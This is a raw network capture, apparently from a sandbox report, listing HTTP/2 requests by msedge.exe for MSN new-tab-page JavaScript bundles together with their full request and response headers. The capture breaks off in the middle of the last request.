GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/search-history-edgenext-wc.34b252b6ab510f09f873.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/search-history-edgenext-wc.34b252b6ab510f09f873.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: TlVsd/zn4C8ngaWGySP/bQ==
last-modified: Tue, 20 Dec 2022 05:42:19 GMT
etag: 0x8DAE24CF5A98921
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 744fd446-301e-004f-295a-145796000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:40 GMT
akamai-request-bc: [a=88.221.24.111,b=431610832,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9dbd0
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/SearchHistoryEdgenextData.374a311a416d7d948536.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/SearchHistoryEdgenextData.374a311a416d7d948536.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 1A/8J3PLPKrDurprAtID0w==
last-modified: Tue, 20 Dec 2022 05:42:19 GMT
etag: 0x8DAE24CF5D3A038
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 852a0d67-f01e-002b-165a-14b9bc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:40 GMT
akamai-request-bc: [a=88.221.24.111,b=431610887,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9dc07
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/select-carousel.cc4acbefe2094d2b0364.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/select-carousel.cc4acbefe2094d2b0364.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: u3d4gDHPP9+JCPyTVlnfZw==
last-modified: Tue, 20 Dec 2022 05:42:17 GMT
etag: 0x8DAE24CF4C42CB1
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6218ee12-901e-0001-135a-14269a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:40 GMT
akamai-request-bc: [a=88.221.24.111,b=431610929,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=20, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9dc31
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/shared-links.5286b1ffbfe696aff00a.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/shared-links.5286b1ffbfe696aff00a.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: nvSmH7NC5ttYPE3mJILLjg==
last-modified: Fri, 16 Dec 2022 21:57:07 GMT
etag: 0x8DADFB079904C28
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8c79a4d5-501e-00e1-460a-1433ed000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:40 GMT
akamai-request-bc: [a=88.221.24.111,b=431611044,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9dca4
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/sharepoint-news-card.ef8314453be9925f488f.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/sharepoint-news-card.ef8314453be9925f488f.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: gphWsUC/uSNPofTbS6cE0Q==
last-modified: Fri, 16 Dec 2022 21:57:05 GMT
etag: 0x8DADFB07870D570
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 334838cc-901e-0069-16ff-133ca9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:40 GMT
akamai-request-bc: [a=88.221.24.111,b=431611126,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9dcf6
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/shopping-edge-insights-card.3ea19097c2ff9950a667.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/shopping-edge-insights-card.3ea19097c2ff9950a667.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: I38VAR2b5P8GRq+R4XD9SA==
last-modified: Tue, 20 Dec 2022 05:42:21 GMT
etag: 0x8DAE24CF6F73506
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: bfb0c5c0-701e-00df-2d5c-14b0e1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:40 GMT
akamai-request-bc: [a=88.221.24.111,b=431611246,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9dd6e
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/shopping-events-deal-card.d7566fbb2ed60ccf2313.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/shopping-events-deal-card.d7566fbb2ed60ccf2313.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: nS8wfxDYCBjmN1PTKP9oPg==
last-modified: Tue, 20 Dec 2022 23:56:02 GMT
etag: 0x8DAE2E5C02EBE00
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5a03426c-a01e-004e-3f38-1b7c94000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:40 GMT
akamai-request-bc: [a=88.221.24.111,b=431611286,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=20, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9dd96
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/shopping-page-base.369d8079097e5d783a69.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/shopping-page-base.369d8079097e5d783a69.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 33YLD3EG4JAMhk4HvY5/rA==
last-modified: Fri, 16 Dec 2022 21:57:05 GMT
etag: 0x8DADFB07886CB48
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: fbae3e99-e01e-0022-392e-14caaf000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:40 GMT
akamai-request-bc: [a=88.221.24.111,b=431611377,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=23, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9ddf1
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/shoppingHomepage.830f74fba820d5a69faa.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/shoppingHomepage.830f74fba820d5a69faa.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: FvXUNmWYI2J7uPvFInWWpw==
last-modified: Tue, 20 Dec 2022 23:56:02 GMT
etag: 0x8DAE2E5BFFF9E9C
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6ad049f7-001e-003c-2436-1cd890000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:40 GMT
akamai-request-bc: [a=88.221.24.111,b=431611521,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=27, clienttt; dur=1, origin; dur=0 , cdntime; dur=1
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9de81
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/shuffle-fre.0e7ad97032438fa4338a.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/shuffle-fre.0e7ad97032438fa4338a.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: Vv8gfqTL6KLR+P2n6BIrBg==
last-modified: Tue, 20 Dec 2022 05:42:23 GMT
etag: 0x8DAE24CF807B9D5
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 852a10d8-f01e-002b-765a-14b9bc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:40 GMT
akamai-request-bc: [a=88.221.24.111,b=431611677,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=24, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9df1d
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/side-bar.600ee59098c5370348c6.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/side-bar.600ee59098c5370348c6.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: ILmxpgQVpf7tP0dB/34yYA==
last-modified: Fri, 16 Dec 2022 21:57:03 GMT
etag: 0x8DADFB07744B676
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 62f08093-801e-0018-3676-13e5ab000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:40 GMT
akamai-request-bc: [a=88.221.24.111,b=431611778,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=25, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9df82
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/sign-in-banner-wc.af11dd8d99c1e5a0d395.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/sign-in-banner-wc.af11dd8d99c1e5a0d395.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: cAzwoR/NN3LlFlFayRqJGA==
last-modified: Tue, 20 Dec 2022 05:42:23 GMT
etag: 0x8DAE24CF7DF7736
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0072a183-301e-008f-7f5b-14d3d2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:40 GMT
akamai-request-bc: [a=88.221.24.111,b=431611860,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=24, clienttt; dur=1, origin; dur=0 , cdntime; dur=1
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9dfd4
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/sign-in-flyout-wc.aa02e471970af1ba1a46.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/sign-in-flyout-wc.aa02e471970af1ba1a46.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: VUpnZDKzpiZ8Ytca0Hjiyw==
last-modified: Tue, 20 Dec 2022 05:42:19 GMT
etag: 0x8DAE24CF594F2B8
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 26888c17-c01e-0020-425c-149cab000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:40 GMT
akamai-request-bc: [a=88.221.24.111,b=431611983,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9e04f
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/SignInData.81c3c0c99a253c9ea77a.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/SignInData.81c3c0c99a253c9ea77a.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: KuWGorLUoIZ6aKDsGdMJcw==
last-modified: Fri, 16 Dec 2022 21:57:06 GMT
etag: 0x8DADFB078F8412A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5b349fd4-c01e-000c-06aa-13f981000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:40 GMT
akamai-request-bc: [a=88.221.24.111,b=431612045,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=20, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9e08d
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/social-avatar.5d2cace8d1dbfd2bd7ce.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/social-avatar.5d2cace8d1dbfd2bd7ce.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: Zh8S5QljP4cpPE1iZ+9QtA==
last-modified: Fri, 16 Dec 2022 21:57:06 GMT
etag: 0x8DADFB0790F4834
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 26701d5c-901e-003d-31f4-12f392000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:40 GMT
akamai-request-bc: [a=88.221.24.111,b=431612119,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=22, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9e0d7
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/social-bar-wc.8353b849362f9ea37eab.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/social-bar-wc.8353b849362f9ea37eab.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: WGvkEG0u/Vuh0tTxoMW3RA==
last-modified: Tue, 20 Dec 2022 05:42:23 GMT
etag: 0x8DAE24CF7E5DEED
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2fe5e075-a01e-00f6-785a-1452c1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:40 GMT
akamai-request-bc: [a=88.221.24.111,b=431612207,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=25, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9e12f
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/social-data-connector.13c70cc7d739a7a3ca55.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/social-data-connector.13c70cc7d739a7a3ca55.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
